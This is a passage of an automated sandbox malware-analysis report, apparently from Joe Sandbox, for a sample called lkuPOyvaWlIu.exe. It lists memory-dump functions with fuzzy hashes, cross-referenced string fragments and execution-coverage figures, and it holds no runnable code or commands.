Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1807713803.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7b70000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6eb4057d445c5db570c48e235662ae274e40c98636455d894f1be6e83623d010
Instruction ID: ff3501372db312bd98d83f4149185dc6a7a04e097b21d2821decd10d0719dfef
Opcode Fuzzy Hash: 6eb4057d445c5db570c48e235662ae274e40c98636455d894f1be6e83623d010
Instruction Fuzzy Hash: 7ED0A7F6705215678624169FB4085FBB7AEFFC5B1230C006EE42A933108F755C00C2E1

Function 07B71798 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1807713803.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7b70000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 367f2dbd06bcad3da3319de9781a91884f4e1b4363dd5c765d97722878c57204
Instruction ID: 1d1f857fa4688791467a146a66b74ba31450406589e37eabb70fa86c5bb1969f
Opcode Fuzzy Hash: 367f2dbd06bcad3da3319de9781a91884f4e1b4363dd5c765d97722878c57204
Instruction Fuzzy Hash: E4E092B0D4020D9FE740EFA9C945A5EBBF4AB48600F1185A9D029EB261E7749A058F91

Function 07B706FF Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1807713803.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7b70000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bff3f95931f651b5dc6dd4700d18853ff0b8b496fda7db9f04dc9f60287a63fd
Instruction ID: e99ce0608b6996f065ca37d8df2cec24cdb2155fc786539d60da5f35856ee927
Opcode Fuzzy Hash: bff3f95931f651b5dc6dd4700d18853ff0b8b496fda7db9f04dc9f60287a63fd
Instruction Fuzzy Hash: B0E0ED38904218CFCB50DF25C8446D8BBB0FB49310F5086D9941D93391DB319E86CF40

Function 07B70F83 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1807713803.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7b70000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56033810d307b36c749f423b53e0f16be9cf1d99885dd3d82ac8e194ac31bdcc
Instruction ID: 9f903a4778a10738f79df24b333e94f7961a36f610ffae43292dbf2c5d832340
Opcode Fuzzy Hash: 56033810d307b36c749f423b53e0f16be9cf1d99885dd3d82ac8e194ac31bdcc
Instruction Fuzzy Hash: 84E02BA024F2D54EC7A3D778A8446A53FA08B03120B1813C7F8D04F1E3CB150B02D392

Function 07B70F90 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1807713803.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7b70000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99e91c2bbf499ea3b0ff151a610b902bf5614136da61e868caa61592ce9d7521
Instruction ID: 8cca0744770c7a618d086f152054512298abbf6dee8097e7b2e2cf42cb74b98e
Opcode Fuzzy Hash: 99e91c2bbf499ea3b0ff151a610b902bf5614136da61e868caa61592ce9d7521
Instruction Fuzzy Hash: 07D0C7B095510DDFDB84EFBC954575D7FB4D701201F2051A9A80453250EB715B54DB91

Function 07B70E86 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1807713803.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7b70000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 863f97afb84157aef9551460f4dcae791ca2a3a9243d725793b9875d50e3e694
Instruction ID: 2a9f1db8c93ef2d5e5544ee0ab0f7851656d6edc855d13fd803e6b96df946ff0
Opcode Fuzzy Hash: 863f97afb84157aef9551460f4dcae791ca2a3a9243d725793b9875d50e3e694
Instruction Fuzzy Hash: 32D0A9B090220CEBC329EAB491086997B78DB02214F1010ACE40412240EB728A80DB82

Function 07B70E88 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1807713803.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7b70000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9f9f4d1deaabd77ed3df2c9231d7cca0fb1c79ca4cbe23fe4910241906c6db2
Instruction ID: 21774bd359540244f1494f6250b4163ec79e6a263e0e50df5a1658777e6f39d5
Opcode Fuzzy Hash: b9f9f4d1deaabd77ed3df2c9231d7cca0fb1c79ca4cbe23fe4910241906c6db2
Instruction Fuzzy Hash: D1D0C9B091620CDBD729EAB495456597B69DB02615F1011ADA40412250DB729A80DB96

Function 07B705FC Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1807713803.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7b70000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47593b97b970f86409087a740b8b7e92e4e69810aef57d2e9a49390de73ac185
Instruction ID: 62f055e2d84edc882577308b7d04b4e21646498fc649318540d19d28a98860f5
Opcode Fuzzy Hash: 47593b97b970f86409087a740b8b7e92e4e69810aef57d2e9a49390de73ac185
Instruction Fuzzy Hash: 26E0BD78904228CFDB50DF20C984BE8BBB5EB49318F0480DA840997256C731DA8ACF40

Function 07B705C2 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1807713803.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7b70000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1c6a04f64d528f13462828ae4d396a0b11c5d51c850d0e049e742d4c775b87d
Instruction ID: 5c89c956454b2f2e3043a53ae60c0bf0627fde9a9943a232eabb110d44880973
Opcode Fuzzy Hash: b1c6a04f64d528f13462828ae4d396a0b11c5d51c850d0e049e742d4c775b87d
Instruction Fuzzy Hash: 8EE04C74A04118DFDB55DF94DC91B9CFBB5FB4D304F14809D9919AB355C6329942CF40

Analysis Process: lkuPOyvaWlIu.exePID: 7552, Parent PID: 7276COMMON

Execution Graph

Execution Coverage:	14.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	2.9%
Total number of Nodes:	172
Total number of Limit Nodes:	24

Executed Functions

Function 056EC147 Relevance: 6.5, Strings: 5, Instructions: 226
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LjAp, xrefs: 056EC38D
LjAp, xrefs: 056EC377
PH^q, xrefs: 056EC3EF
PH^q, xrefs: 056EC400
0oAp, xrefs: 056EC20A

Memory Dump Source

Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: c0721a0cbd273ee8ed8712e891e4ef5804521165274ff21e18b98ef454d0a486
Instruction ID: 41b33786133847c19ff88ddd222190a40c122a69f8fb72da62071c4da26bdeb1
Opcode Fuzzy Hash: c0721a0cbd273ee8ed8712e891e4ef5804521165274ff21e18b98ef454d0a486
Instruction Fuzzy Hash: 88A1D775E01218DFEB14DFA9D984A9DBBF2BF49300F14806AE409AB365DB309D85CF50

Function 056EC46C Relevance: 6.5, Strings: 5, Instructions: 203
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LjAp, xrefs: 056EC65D
0oAp, xrefs: 056EC4DA
PH^q, xrefs: 056EC6BF
PH^q, xrefs: 056EC6D0
LjAp, xrefs: 056EC647

Memory Dump Source

Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: b8cf7bd2f83dffbba5d14043bc205de3c545b292e382e2f547b0c4ec19b23727
Instruction ID: d2d5f5d2ce255ddafc850b732fc1f6403b2bb8af77cd03033a7e3acc4a44a2d9
Opcode Fuzzy Hash: b8cf7bd2f83dffbba5d14043bc205de3c545b292e382e2f547b0c4ec19b23727
Instruction Fuzzy Hash: EE91C674E01218CFDB14DFAAD844A9DBBF2FF89300F149069E419AB365DB305981CF50

Function 056E5362 Relevance: 6.4, Strings: 5, Instructions: 200
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH^q, xrefs: 056E55D9
LjAp, xrefs: 056E5550
0oAp, xrefs: 056E53E2
PH^q, xrefs: 056E55C8
LjAp, xrefs: 056E5566

Memory Dump Source

Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: 73f37819006201135e6acf07bf894d6613017c9370a59e4062e5301852f3bd54
Instruction ID: 99c874647f31fc12f6f9947952832cae1ad59b20f7604f486e8343cee7a79127
Opcode Fuzzy Hash: 73f37819006201135e6acf07bf894d6613017c9370a59e4062e5301852f3bd54
Instruction Fuzzy Hash: 3E91C674E05218CFDB14CFA9D984A9DBBF2BF89304F14C06AE809AB365DB749985CF50

Function 056ECCD8 Relevance: 6.4, Strings: 5, Instructions: 189
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH^q, xrefs: 056ECF40
PH^q, xrefs: 056ECF2F
LjAp, xrefs: 056ECEB7
LjAp, xrefs: 056ECECD
0oAp, xrefs: 056ECD4A

Memory Dump Source

Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: 704d9c2e925e0046bd9e835e6747a0115a002851dd4064792717cb7d6c85411b
Instruction ID: a3b52ccbaec13f049b811380383d1984c934482129b276263a81cdd1843f11a0
Opcode Fuzzy Hash: 704d9c2e925e0046bd9e835e6747a0115a002851dd4064792717cb7d6c85411b
Instruction Fuzzy Hash: E881A474E412189FEB14CFAAD944A9DBBF2BF89300F14C069E419AB365DB309985CF50

Function 056ED278 Relevance: 6.4, Strings: 5, Instructions: 188
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0oAp, xrefs: 056ED2EA
PH^q, xrefs: 056ED4CF
PH^q, xrefs: 056ED4E0
LjAp, xrefs: 056ED457
LjAp, xrefs: 056ED46D

Memory Dump Source

Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: 33e9a6d9b3de3c386e5255d18e16ad883ef64b171930390fc5be1c2a41f39751
Instruction ID: 35175f4088c58a9403d17bd1c01d10368b77388e16ee2979d01c4166ec1751f5
Opcode Fuzzy Hash: 33e9a6d9b3de3c386e5255d18e16ad883ef64b171930390fc5be1c2a41f39751
Instruction Fuzzy Hash: 1D81B674E01218CFDB14DFAAD944A9DBBF2BF89300F14C069E819AB365DB349985CF50

Function 056ECA08 Relevance: 6.4, Strings: 5, Instructions: 188
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LjAp, xrefs: 056ECBFD
PH^q, xrefs: 056ECC5F
0oAp, xrefs: 056ECA7A
LjAp, xrefs: 056ECBE7
PH^q, xrefs: 056ECC70

Memory Dump Source

Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: 51bba6c007684675d9ba0c8a07ff43ac910d25a555ee05c45fa44aa128fd5556
Instruction ID: e9976b8184fccdb219d3016008bca88d6e21b3cdc226c8f228711a4fd80279e8
Opcode Fuzzy Hash: 51bba6c007684675d9ba0c8a07ff43ac910d25a555ee05c45fa44aa128fd5556
Instruction Fuzzy Hash: 8D819474E01218CFEB54DFAAD944A9DBBF2BF89300F14C069E819AB365DB349985CF50

Function 056EC738 Relevance: 6.4, Strings: 5, Instructions: 185
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LjAp, xrefs: 056EC917
PH^q, xrefs: 056EC9A0
LjAp, xrefs: 056EC92D
0oAp, xrefs: 056EC7AA
PH^q, xrefs: 056EC98F

Memory Dump Source

Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: 545dab09a71c5504257aa7335e37643feb9960cfc1d811a0bc86924937baf7d0
Instruction ID: 9ebae17f2fca6bb9bee0606b1c2dad70a9a7e42391755e4dfae7989b479b5fab
Opcode Fuzzy Hash: 545dab09a71c5504257aa7335e37643feb9960cfc1d811a0bc86924937baf7d0
Instruction Fuzzy Hash: B181B574E01218DFEB54DFAAD944A9DBBF2BF88300F14C069E819AB365DB349945CF50

Function 056ECFAB Relevance: 6.4, Strings: 5, Instructions: 183
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH^q, xrefs: 056ED210
PH^q, xrefs: 056ED1FF
0oAp, xrefs: 056ED01A
LjAp, xrefs: 056ED187
LjAp, xrefs: 056ED19D

Memory Dump Source

Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: 0b8db554941b287b8d104af44bb66554db165af44a90158e39f326d6b1e46d34
Instruction ID: 04e19e711bb8c866637e0beddd9b3bea1027f1746137f0db33cc69d4322245e9
Opcode Fuzzy Hash: 0b8db554941b287b8d104af44bb66554db165af44a90158e39f326d6b1e46d34
Instruction Fuzzy Hash: 7E81B574E01218CFDB54DFAAD984A9DBBF2BF89300F14C069E819AB365DB349985CF50

Function 056E29EC Relevance: 5.4, Strings: 4, Instructions: 417
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Xbq, xrefs: 056E2BA4
Xbq, xrefs: 056E2B57
Xbq, xrefs: 056E2A9E
Xbq, xrefs: 056E2AD8

Memory Dump Source

Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID: Xbq$Xbq$Xbq$Xbq
API String ID: 0-2732225958
Opcode ID: db1a2da0ba7d2924cb4400e64c1d090648f42eba8d0dd1e5be3c840cb8774b73
Instruction ID: e09fcdc6bd28bc384b9f25240dc40206b6837f69e3523b94eb7c804e3a96025e
Opcode Fuzzy Hash: db1a2da0ba7d2924cb4400e64c1d090648f42eba8d0dd1e5be3c840cb8774b73
Instruction Fuzzy Hash: 15D1253AA2724847CB259F38CB9275ABF76FB55600F588914C60597321DF20F78AE741

Function 056E7118 Relevance: 5.3, Strings: 4, Instructions: 333
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(o^q, xrefs: 056E7220
(o^q, xrefs: 056E7212
,bq, xrefs: 056E7298
,bq, xrefs: 056E728A

Memory Dump Source

Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$,bq$,bq
API String ID: 0-879173519
Opcode ID: 68cd0f2f1c833a6670d1efab29ec97284bed372d07e7cddd584cf69f34a18e44
Instruction ID: a40c52906e41a65ec67e324e6e7bba3332f059a3085e61d3e2300837e38bf3e4
Opcode Fuzzy Hash: 68cd0f2f1c833a6670d1efab29ec97284bed372d07e7cddd584cf69f34a18e44
Instruction Fuzzy Hash: E7D11B70A02159DFCB15CFA9D884AADBBB2FF88304F558165E815AB764DB30ED42CF90

Function 056EA088 Relevance: 3.4, Strings: 2, Instructions: 900COMMON

Download Yara Rule

Strings

4'^q, xrefs: 056EAB13
(o^q, xrefs: 056EA518

Memory Dump Source

Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID: (o^q$4'^q
API String ID: 0-273632683
Opcode ID: 5a2a89501b5d2607b0453d9043bff8bc3cf22e6d52ec900fe04483ee343d5cbd
Instruction ID: 6c1a3acd84c3b9524497487fcc38333d54d0638581aa27855f3d117f59a0da4f
Opcode Fuzzy Hash: 5a2a89501b5d2607b0453d9043bff8bc3cf22e6d52ec900fe04483ee343d5cbd
Instruction Fuzzy Hash: C4825E75A02209DFCB15CFA8C588AAEBBF2FF88310F158559E4059B3A5DB31ED81CB51

Function 056E69A0 Relevance: 3.0, Strings: 2, Instructions: 517COMMON

Download Yara Rule

Strings

Hbq, xrefs: 056E6DA6
(o^q, xrefs: 056E6EDA

Memory Dump Source

Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID: (o^q$Hbq
API String ID: 0-662517225
Opcode ID: 2a9598bcd78239c6326d2e52e70efc86aa6ae7bf29df8fb978b7d90905c67f4c
Instruction ID: d8673d7135944fd610f4856f0a2841bb20db42e34660fec343a86de51311587d
Opcode Fuzzy Hash: 2a9598bcd78239c6326d2e52e70efc86aa6ae7bf29df8fb978b7d90905c67f4c
Instruction Fuzzy Hash: B1125D70A012199FCB15DF69D854AAEBBF6FF98300F248569E809DB391DF309D42CB91

Function 06F29548 Relevance: 1.9, APIs: 1, Instructions: 357COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4139419804.0000000006F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6f20000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e85041efc610157da07dc3cf156e233aa72b7ee026887088563d7158f545c8eb
Instruction ID: 82837445fef25f029077041497b9bd2c808982c3090d3ccfd757df8091d9db91
Opcode Fuzzy Hash: e85041efc610157da07dc3cf156e233aa72b7ee026887088563d7158f545c8eb
Instruction Fuzzy Hash: 1CF10474E01229CFDB54DFA9D884B9DBBB2BF88304F14C1A9E808AB355DB709985CF50

Function 056EE97B Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 110329ffc66d66f59c8c994b77438874381dc119fcbabac038d05bed4d6d1d5f
Instruction ID: 9bf34f1e19c934b1f8c86166a1fc82e7c3589b85358bff80f8eb29cbbb271ed0
Opcode Fuzzy Hash: 110329ffc66d66f59c8c994b77438874381dc119fcbabac038d05bed4d6d1d5f
Instruction Fuzzy Hash: 2051B674E01208DFDB18DFAAD584A9DBBB6FF89300F24C02AE815AB364DB359945CF14

Function 056EE988 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2661f95f7fc10320cfdc2eb7feed3ef9d427e678489774f784fc9a64fc91b3a0
Instruction ID: 773a479318c1d558d5ea96428da578fec25fd06f5c292e24359310cbb975901a
Opcode Fuzzy Hash: 2661f95f7fc10320cfdc2eb7feed3ef9d427e678489774f784fc9a64fc91b3a0
Instruction Fuzzy Hash: 2251B374E01208DFDB18DFAAD584A9DBBB6FF88300F208429E819AB364DB319945CF14

Function 056E76F1 Relevance: 10.5, Strings: 8, Instructions: 482
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(o^q, xrefs: 056E772E
,bq, xrefs: 056E7BA0
(o^q, xrefs: 056E7BFF
(o^q, xrefs: 056E78B2
(o^q, xrefs: 056E77E9
(o^q, xrefs: 056E7815
(o^q, xrefs: 056E7C0F
,bq, xrefs: 056E7B90

Memory Dump Source

Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$(o^q$(o^q$(o^q$(o^q$,bq$,bq
API String ID: 0-1932283790
Opcode ID: c540f65aae93274e3c5d7f6668f36c31bef7bc2ef79646675df4cc0aca1edbc0
Instruction ID: 1817b505023d564acf28e64363eec95725f7b9e9eb5a91639822d16e4070dfae
Opcode Fuzzy Hash: c540f65aae93274e3c5d7f6668f36c31bef7bc2ef79646675df4cc0aca1edbc0
Instruction Fuzzy Hash: 11126D30A022499FCB15CF68D984AAEBBF2FF48314F1485A9E856DB761DB30ED45CB50

Function 056E5F38 Relevance: 2.8, Strings: 2, Instructions: 268COMMON

Download Yara Rule

Strings

Hbq, xrefs: 056E6023
Hbq, xrefs: 056E6056

Memory Dump Source

Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID: Hbq$Hbq
API String ID: 0-4258043069
Opcode ID: ea3c3a86e7e0134b45e38ff204d299857355245233db5884f0b796155a27b405
Instruction ID: c4f487c99479dd42352b580ea475e8056d39c715d02c86acfeac04500038b8ab
Opcode Fuzzy Hash: ea3c3a86e7e0134b45e38ff204d299857355245233db5884f0b796155a27b405
Instruction Fuzzy Hash: 8D919C343062558FDB169F38D858A6E7BA6BFA8300F14846AE806CB791DF34CC42DB91

Function 056E6498 Relevance: 2.7, Strings: 2, Instructions: 234COMMON

Download Yara Rule

Strings

,bq, xrefs: 056E6578
,bq, xrefs: 056E656E

Memory Dump Source

Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID: ,bq$,bq
API String ID: 0-2699258169
Opcode ID: d445adaf79c4c1f7b219c3b11ad957ae4f34764dc4fe23101e41d3df39abd77c
Instruction ID: 077952f05306ea82bd2a4b9ee5ec35af1de14c25aab11e0f8b82801c9f6552ad
Opcode Fuzzy Hash: d445adaf79c4c1f7b219c3b11ad957ae4f34764dc4fe23101e41d3df39abd77c
Instruction Fuzzy Hash: 7781B030B17505CFCB14CF69E888969BBF2BF9A310B158169D406EB765DB31EC82CB52

Function 056E9C30 Relevance: 2.7, Strings: 2, Instructions: 152COMMON

Download Yara Rule

Strings

4'^q, xrefs: 056E9D84
4'^q, xrefs: 056E9D6D

Memory Dump Source

Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: 97711fdbdebeac29f7313423fdf83bd73cfbbfee1986dcd9ed3c7af2de761475
Instruction ID: cf55b9d20aff3e4dc684f1503cb12b07eb76981d8f4c370ac7016ae273fc8391
Opcode Fuzzy Hash: 97711fdbdebeac29f7313423fdf83bd73cfbbfee1986dcd9ed3c7af2de761475
Instruction Fuzzy Hash: F3518D347022189FDB01DB69C844B7A7BABFF89310F148466E909CB355EB71CC42CBA1

Function 056E3CB1 Relevance: 2.6, Strings: 2, Instructions: 116COMMON

Download Yara Rule

Strings

Xbq, xrefs: 056E3CCD
Xbq, xrefs: 056E3CF6

Memory Dump Source

Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID: Xbq$Xbq
API String ID: 0-1243427068
Opcode ID: 788e897e511bcf9d788c461bba58f263bd09b4492a441a9f16882f5e1945de58
Instruction ID: 52ac30c3ed1b83e3d18df743330e0bce6ee88a7dc94ec835a74de2e043f1589b
Opcode Fuzzy Hash: 788e897e511bcf9d788c461bba58f263bd09b4492a441a9f16882f5e1945de58
Instruction Fuzzy Hash: BC31E73570B3648BDF28867A599827EAAE7BBC4200F18483EE807D3794DB75DC45C761

Function 056E8EF8 Relevance: 2.6, Strings: 2, Instructions: 107COMMON

Download Yara Rule

Strings

$^q, xrefs: 056E8FD7
$^q, xrefs: 056E8FB4

Memory Dump Source

Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: 41cd9494b60a2115e7484e7677720cb35e89954107dca6155dc97144fad8e267
Instruction ID: 1443289423c02143e5667e973a31cf78ef97d826ea4ffca52aa10f109159d831
Opcode Fuzzy Hash: 41cd9494b60a2115e7484e7677720cb35e89954107dca6155dc97144fad8e267
Instruction Fuzzy Hash: 7A31C2313172114FCB268B298894A3E7B67BB85780B24849AF012DB793EF28DC81C755

Function 056E0C8F Relevance: 1.8, Strings: 1, Instructions: 547COMMON

Download Yara Rule

Strings

LR^q, xrefs: 056E0F19

Memory Dump Source

Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd

Similarity

API ID:
String ID: LR^q
API String ID: 0-2625958711
Opcode ID: 75722f1f48b74824c6ec0a86bdc1e1717e95eb511cbb1d5a4d8b3a8b031c3aa0
Instruction ID: 90e58cfb07e80d2245b99765a1c03e1821303d46acef80bd19318c8739c3ec88
Opcode Fuzzy Hash: 75722f1f48b74824c6ec0a86bdc1e1717e95eb511cbb1d5a4d8b3a8b031c3aa0
Instruction Fuzzy Hash: C152D974A01219CFCB54DF68E99CA9DBBF2FB48301F1082A6D409A7365DB346E85CF91

Function 056E0CA0 Relevance: 1.8, Strings: 1, Instructions: 539COMMON

Download Yara Rule

Strings

LR^q, xrefs: 056E0F19

Memory Dump Source

Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false

Joe Sandbox IDA Plugin

